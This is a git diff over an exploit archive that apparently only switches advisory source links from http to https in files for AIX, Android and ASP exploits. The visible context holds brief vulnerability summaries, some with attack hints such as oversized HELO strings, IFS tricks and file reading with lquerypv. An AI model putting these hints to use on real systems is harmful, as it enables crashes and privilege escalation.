diff --git a/exploits/aix/dos/19046.txt b/exploits/aix/dos/19046.txt index ece7403f7..ba9ad9606 100644 --- a/exploits/aix/dos/19046.txt +++ b/exploits/aix/dos/19046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61/info +source: https://www.securityfocus.com/bid/61/info There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash. diff --git a/exploits/aix/dos/19049.txt b/exploits/aix/dos/19049.txt index 6fcbe7106..9f21c4436 100644 --- a/exploits/aix/dos/19049.txt +++ b/exploits/aix/dos/19049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66/info +source: https://www.securityfocus.com/bid/66/info A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented out of /etc/inetd.conf. The tcpmux service is defined in RFC1078 diff --git a/exploits/aix/dos/22249.txt b/exploits/aix/dos/22249.txt index da0d0eb00..6f58cb6ef 100644 --- a/exploits/aix/dos/22249.txt +++ b/exploits/aix/dos/22249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6840/info +source: https://www.securityfocus.com/bid/6840/info A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges. diff --git a/exploits/aix/dos/25807.txt b/exploits/aix/dos/25807.txt index 226d9f143..e02b6d3b3 100644 --- a/exploits/aix/dos/25807.txt +++ b/exploits/aix/dos/25807.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13909/info +source: https://www.securityfocus.com/bid/13909/info invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line. diff --git a/exploits/aix/local/19041.txt b/exploits/aix/local/19041.txt index c527d6c4b..eb33ee49d 100644 --- a/exploits/aix/local/19041.txt +++ b/exploits/aix/local/19041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17/info +source: https://www.securityfocus.com/bid/17/info By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges. diff --git a/exploits/aix/local/19043.txt b/exploits/aix/local/19043.txt index c9e971481..9b14c1628 100644 --- a/exploits/aix/local/19043.txt +++ b/exploits/aix/local/19043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22/info +source: https://www.securityfocus.com/bid/22/info This applies to sites that have installed Sun Source tapes only. diff --git a/exploits/aix/local/19045.txt b/exploits/aix/local/19045.txt index 816c8051c..c219a610a 100644 --- a/exploits/aix/local/19045.txt +++ b/exploits/aix/local/19045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59/info +source: https://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. diff --git a/exploits/aix/local/19213.sh b/exploits/aix/local/19213.sh index 771043b3f..d9b362b5a 100755 --- a/exploits/aix/local/19213.sh +++ b/exploits/aix/local/19213.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19214.c b/exploits/aix/local/19214.c index 30cc476bb..1a09f6483 100644 --- a/exploits/aix/local/19214.c +++ b/exploits/aix/local/19214.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +// source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19215.c b/exploits/aix/local/19215.c index 5cab6d212..259349409 100644 --- a/exploits/aix/local/19215.c +++ b/exploits/aix/local/19215.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. */ diff --git a/exploits/aix/local/19216.c b/exploits/aix/local/19216.c index bc66aedbd..50e827ec6 100644 --- a/exploits/aix/local/19216.c +++ b/exploits/aix/local/19216.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +// source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19217.c b/exploits/aix/local/19217.c index 5055a831d..b6b9a4ceb 100644 --- a/exploits/aix/local/19217.c +++ b/exploits/aix/local/19217.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. */ diff --git a/exploits/aix/local/19229.txt b/exploits/aix/local/19229.txt index 81069e150..7abc9e2d7 100644 --- a/exploits/aix/local/19229.txt +++ b/exploits/aix/local/19229.txt @@ -1,4 +1,4 @@ -soure: http://www.securityfocus.com/bid/287/info +soure: https://www.securityfocus.com/bid/287/info IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file. diff --git a/exploits/aix/local/19287.c b/exploits/aix/local/19287.c index 9e334bcd9..14cd401a4 100644 --- a/exploits/aix/local/19287.c +++ b/exploits/aix/local/19287.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/370/info +source: https://www.securityfocus.com/bid/370/info Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under. */ diff --git a/exploits/aix/local/19300.txt b/exploits/aix/local/19300.txt index e3580de0b..fc3838f2a 100644 --- a/exploits/aix/local/19300.txt +++ b/exploits/aix/local/19300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/375/info +source: https://www.securityfocus.com/bid/375/info The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. diff --git a/exploits/aix/local/19306.c b/exploits/aix/local/19306.c index 04c041277..c14e38e01 100644 --- a/exploits/aix/local/19306.c +++ b/exploits/aix/local/19306.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/385/info +source: https://www.securityfocus.com/bid/385/info AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information. */ diff --git a/exploits/aix/local/19307.c b/exploits/aix/local/19307.c index a09b8e2f7..f3bfb0f18 100644 --- a/exploits/aix/local/19307.c +++ b/exploits/aix/local/19307.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/387/info +// source: https://www.securityfocus.com/bid/387/info A buffer overflow condition exists in some versions of /usr/sbin/ping under AIX. Given that ping is SUID root, this overflow allows malicious users to gain root from it. diff --git a/exploits/aix/local/19309.c b/exploits/aix/local/19309.c index 862436da1..9a7b218d5 100644 --- a/exploits/aix/local/19309.c +++ b/exploits/aix/local/19309.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/389/info +source: https://www.securityfocus.com/bid/389/info A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv. diff --git a/exploits/aix/local/19318.c b/exploits/aix/local/19318.c index f80175c43..4b3f5bfd7 100644 --- a/exploits/aix/local/19318.c +++ b/exploits/aix/local/19318.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/417/info +// source: https://www.securityfocus.com/bid/417/info A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrary code can be executed as group sys. diff --git a/exploits/aix/local/19344.sh b/exploits/aix/local/19344.sh index 296946751..1b73b7a84 100755 
--- a/exploits/aix/local/19344.sh +++ b/exploits/aix/local/19344.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/454/info +#source: https://www.securityfocus.com/bid/454/info # #Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. # diff --git a/exploits/aix/local/19345.txt b/exploits/aix/local/19345.txt index 18f73926f..7114f978e 100644 --- a/exploits/aix/local/19345.txt +++ b/exploits/aix/local/19345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/455/info +source: https://www.securityfocus.com/bid/455/info There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. diff --git a/exploits/aix/local/19354.txt b/exploits/aix/local/19354.txt index 3ca96e695..ed576ae8e 100644 --- a/exploits/aix/local/19354.txt +++ b/exploits/aix/local/19354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/468/info +source: https://www.securityfocus.com/bid/468/info The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this program without changing their uid to the users, from roots. As such, arbitrary commands can be executed as root using the 'print to command' option of sgihelp. diff --git a/exploits/aix/local/19418.txt b/exploits/aix/local/19418.txt index fd78d5d29..f3eaee5d5 100644 --- a/exploits/aix/local/19418.txt +++ b/exploits/aix/local/19418.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/520/info +source: https://www.securityfocus.com/bid/520/info adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being halted by a malicious local user. diff --git a/exploits/aix/local/20213.txt b/exploits/aix/local/20213.txt index 115e1b4b0..0e7b9f652 100644 --- a/exploits/aix/local/20213.txt +++ b/exploits/aix/local/20213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1660/info +source: https://www.securityfocus.com/bid/1660/info A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical information. diff --git a/exploits/aix/local/20290.txt b/exploits/aix/local/20290.txt index 8b72c4d02..e794c56d1 100644 --- a/exploits/aix/local/20290.txt +++ b/exploits/aix/local/20290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1800/info +source: https://www.securityfocus.com/bid/1800/info A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known. diff --git a/exploits/aix/local/20452.c b/exploits/aix/local/20452.c index f0313efad..ea65bcdce 100644 --- a/exploits/aix/local/20452.c +++ b/exploits/aix/local/20452.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2032/info +source: https://www.securityfocus.com/bid/2032/info AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges. diff --git a/exploits/aix/local/20453.c b/exploits/aix/local/20453.c index e500ce4d4..5e1cde304 100644 --- a/exploits/aix/local/20453.c +++ b/exploits/aix/local/20453.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2033/info +source: https://www.securityfocus.com/bid/2033/info AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge. diff --git a/exploits/aix/local/20454.sh b/exploits/aix/local/20454.sh index af36beb50..d748871f6 100755 --- a/exploits/aix/local/20454.sh +++ b/exploits/aix/local/20454.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2034/info +source: https://www.securityfocus.com/bid/2034/info AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges. diff --git a/exploits/aix/local/20455.c b/exploits/aix/local/20455.c index c6ee52f55..474340d38 100644 --- a/exploits/aix/local/20455.c +++ b/exploits/aix/local/20455.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2037/info +source: https://www.securityfocus.com/bid/2037/info AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges. diff --git a/exploits/aix/local/20965.sh b/exploits/aix/local/20965.sh index e1bfc39ed..fba31abf7 100755 --- a/exploits/aix/local/20965.sh +++ b/exploits/aix/local/20965.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2916/info +source: https://www.securityfocus.com/bid/2916/info AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default. 
diff --git a/exploits/aix/local/21094.c b/exploits/aix/local/21094.c index eff650bbe..0a2d0d8d4 100644 --- a/exploits/aix/local/21094.c +++ b/exploits/aix/local/21094.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/3238/info +// source: https://www.securityfocus.com/bid/3238/info // // The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group. // diff --git a/exploits/aix/local/21904.pl b/exploits/aix/local/21904.pl index 79de013b6..856d93cf7 100755 --- a/exploits/aix/local/21904.pl +++ b/exploits/aix/local/21904.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5885/info +source: https://www.securityfocus.com/bid/5885/info The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges. diff --git a/exploits/aix/local/22756.pl b/exploits/aix/local/22756.pl index 7bb6373b6..b917b64b6 100755 --- a/exploits/aix/local/22756.pl +++ b/exploits/aix/local/22756.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7871/info +source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/aix/local/23838.pl b/exploits/aix/local/23838.pl index c7a2c6b6e..5a8d0880a 100755 --- a/exploits/aix/local/23838.pl +++ b/exploits/aix/local/23838.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9903/info +source: https://www.securityfocus.com/bid/9903/info GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler. diff --git a/exploits/aix/local/23840.pl b/exploits/aix/local/23840.pl index 387a572f1..1d2ec80d6 100755 --- a/exploits/aix/local/23840.pl +++ b/exploits/aix/local/23840.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9905/info +source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. diff --git a/exploits/aix/local/23841.c b/exploits/aix/local/23841.c index 831a19df5..6b1f42bec 100644 --- a/exploits/aix/local/23841.c +++ b/exploits/aix/local/23841.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9905/info +// source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. diff --git a/exploits/aix/local/23883.pl b/exploits/aix/local/23883.pl index 13ae5cf8b..b3e0ae0f4 100755 --- a/exploits/aix/local/23883.pl +++ b/exploits/aix/local/23883.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9982/info +source: https://www.securityfocus.com/bid/9982/info Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges. diff --git a/exploits/aix/local/25039.txt b/exploits/aix/local/25039.txt index e8547373f..a14b65a41 100644 --- a/exploits/aix/local/25039.txt +++ b/exploits/aix/local/25039.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12041/info +source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable. diff --git a/exploits/aix/local/26996.txt b/exploits/aix/local/26996.txt index 04d936212..8f11df067 100644 --- a/exploits/aix/local/26996.txt +++ b/exploits/aix/local/26996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16102/info +source: https://www.securityfocus.com/bid/16102/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. diff --git a/exploits/aix/local/26997.txt b/exploits/aix/local/26997.txt index c1797417b..63dfbbc06 100644 --- a/exploits/aix/local/26997.txt +++ b/exploits/aix/local/26997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16103/info +source: https://www.securityfocus.com/bid/16103/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. diff --git a/exploits/aix/local/30399.c b/exploits/aix/local/30399.c index e7275e2a4..3d7fc645e 100644 --- a/exploits/aix/local/30399.c +++ b/exploits/aix/local/30399.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25075/info +// source: https://www.securityfocus.com/bid/25075/info IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser. diff --git a/exploits/aix/remote/19047.txt b/exploits/aix/remote/19047.txt index 2c210a87d..a6bfc9f6f 100644 --- a/exploits/aix/remote/19047.txt 
+++ b/exploits/aix/remote/19047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62/info +source: https://www.securityfocus.com/bid/62/info There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash. diff --git a/exploits/aix/remote/19048.txt b/exploits/aix/remote/19048.txt index 939a41ae9..47a96aa6b 100644 --- a/exploits/aix/remote/19048.txt +++ b/exploits/aix/remote/19048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64/info +source: https://www.securityfocus.com/bid/64/info There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018. diff --git a/exploits/aix/remote/19237.txt b/exploits/aix/remote/19237.txt index f9eda09f7..ebe14f163 100644 --- a/exploits/aix/remote/19237.txt +++ b/exploits/aix/remote/19237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/297/info +source: https://www.securityfocus.com/bid/297/info NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server. diff --git a/exploits/aix/remote/19348.txt b/exploits/aix/remote/19348.txt index ad86c8129..a86a27c51 100644 --- a/exploits/aix/remote/19348.txt +++ b/exploits/aix/remote/19348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/458/info +source: https://www.securityfocus.com/bid/458/info A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. diff --git a/exploits/aix/remote/19532.pl b/exploits/aix/remote/19532.pl index bcd7d73a0..5e9aead85 100755 --- a/exploits/aix/remote/19532.pl +++ b/exploits/aix/remote/19532.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/679/info +source: https://www.securityfocus.com/bid/679/info A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access. diff --git a/exploits/aix/remote/21093.c b/exploits/aix/remote/21093.c index a9305038f..fd6b64f6f 100644 --- a/exploits/aix/remote/21093.c +++ b/exploits/aix/remote/21093.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3237/info +// source: https://www.securityfocus.com/bid/3237/info The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems. diff --git a/exploits/android/dos/31307.py b/exploits/android/dos/31307.py index fa0e4e229..a2144cad6 100755 --- a/exploits/android/dos/31307.py +++ b/exploits/android/dos/31307.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28005/info +source: https://www.securityfocus.com/bid/28005/info Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/android/dos/31308.html b/exploits/android/dos/31308.html index e39a4db95..3c062888c 100644 --- a/exploits/android/dos/31308.html +++ b/exploits/android/dos/31308.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28006/info +source: https://www.securityfocus.com/bid/28006/info Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data. diff --git a/exploits/android/dos/42135.c b/exploits/android/dos/42135.c index a413b38c5..2ce469a51 100644 --- a/exploits/android/dos/42135.c +++ b/exploits/android/dos/42135.c 
@@ -1,5 +1,5 @@ -# Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c -# +// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c + #include #include #include diff --git a/exploits/android/local/39061.txt b/exploits/android/local/39061.txt index 5aa21d674..d88314ee8 100644 --- a/exploits/android/local/39061.txt +++ b/exploits/android/local/39061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65123/info +source: https://www.securityfocus.com/bid/65123/info GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities. diff --git a/exploits/android/remote/37792.txt b/exploits/android/remote/37792.txt index a95693396..3150114f5 100644 --- a/exploits/android/remote/37792.txt +++ b/exploits/android/remote/37792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37793.txt b/exploits/android/remote/37793.txt index 4f19e5558..b5fca14b6 100644 --- a/exploits/android/remote/37793.txt +++ b/exploits/android/remote/37793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37794.txt b/exploits/android/remote/37794.txt index fee0eeea1..38af91b8f 100644 --- a/exploits/android/remote/37794.txt +++ b/exploits/android/remote/37794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37795.txt b/exploits/android/remote/37795.txt index 2efb3bf45..765abbe39 100644 --- a/exploits/android/remote/37795.txt 
+++ b/exploits/android/remote/37795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/38170.txt b/exploits/android/remote/38170.txt index 763d1653a..0eb03db25 100644 --- a/exploits/android/remote/38170.txt +++ b/exploits/android/remote/38170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57173/info +source: https://www.securityfocus.com/bid/57173/info Facebook for Android is prone to an information-disclosure vulnerability. diff --git a/exploits/android/remote/38310.c b/exploits/android/remote/38310.c index 611abddc3..c6db1077d 100644 --- a/exploits/android/remote/38310.c +++ b/exploits/android/remote/38310.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57900/info +// source: https://www.securityfocus.com/bid/57900/info The PowerVR SGX driver in Android is prone to an information-disclosure vulnerability. diff --git a/exploits/android/remote/38586.txt b/exploits/android/remote/38586.txt index 58327ea7b..26bb9e36e 100644 --- a/exploits/android/remote/38586.txt +++ b/exploits/android/remote/38586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60566/info +source: https://www.securityfocus.com/bid/60566/info TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/android/remote/38627.sh b/exploits/android/remote/38627.sh index e8c3606b5..7db2c1863 100755 --- a/exploits/android/remote/38627.sh +++ b/exploits/android/remote/38627.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/60952/info +#source: https://www.securityfocus.com/bid/60952/info # #Google Android is prone to a remote security-bypass vulnerability. # diff --git a/exploits/android/remote/38821.py b/exploits/android/remote/38821.py index 177911f22..a1552f784 100755 
--- a/exploits/android/remote/38821.py +++ b/exploits/android/remote/38821.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63547/info +source: https://www.securityfocus.com/bid/63547/info Google Android is prone to a security-bypass vulnerability. diff --git a/exploits/asp/dos/25962.xml b/exploits/asp/dos/25962.xml index db1366944..7e869cffc 100644 --- a/exploits/asp/dos/25962.xml +++ b/exploits/asp/dos/25962.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14217/info +source: https://www.securityfocus.com/bid/14217/info ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests. diff --git a/exploits/asp/dos/27258.txt b/exploits/asp/dos/27258.txt index 2a2bd2483..f9f63dd25 100644 --- a/exploits/asp/dos/27258.txt +++ b/exploits/asp/dos/27258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16771/info +source: https://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. diff --git a/exploits/asp/dos/35154.txt b/exploits/asp/dos/35154.txt index d579dad4a..a29d1ec16 100644 --- a/exploits/asp/dos/35154.txt +++ b/exploits/asp/dos/35154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45588/info +source: https://www.securityfocus.com/bid/45588/info Sigma Portal is prone to a denial-of-service vulnerability. diff --git a/exploits/asp/remote/27861.txt b/exploits/asp/remote/27861.txt index 4facf9b83..522ac199c 100644 --- a/exploits/asp/remote/27861.txt +++ b/exploits/asp/remote/27861.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17964/info +source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/remote/27862.txt b/exploits/asp/remote/27862.txt index 6d3f88770..111577518 100644 --- a/exploits/asp/remote/27862.txt +++ b/exploits/asp/remote/27862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17964/info +source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/16178.txt b/exploits/asp/webapps/16178.txt index 0dad792ad..68ed3a20a 100644 --- a/exploits/asp/webapps/16178.txt +++ b/exploits/asp/webapps/16178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45211/info +source: https://www.securityfocus.com/bid/45211/info Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/16179.txt b/exploits/asp/webapps/16179.txt index eb0a65239..60ced44de 100644 --- a/exploits/asp/webapps/16179.txt +++ b/exploits/asp/webapps/16179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45212/info +source: https://www.securityfocus.com/bid/45212/info Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
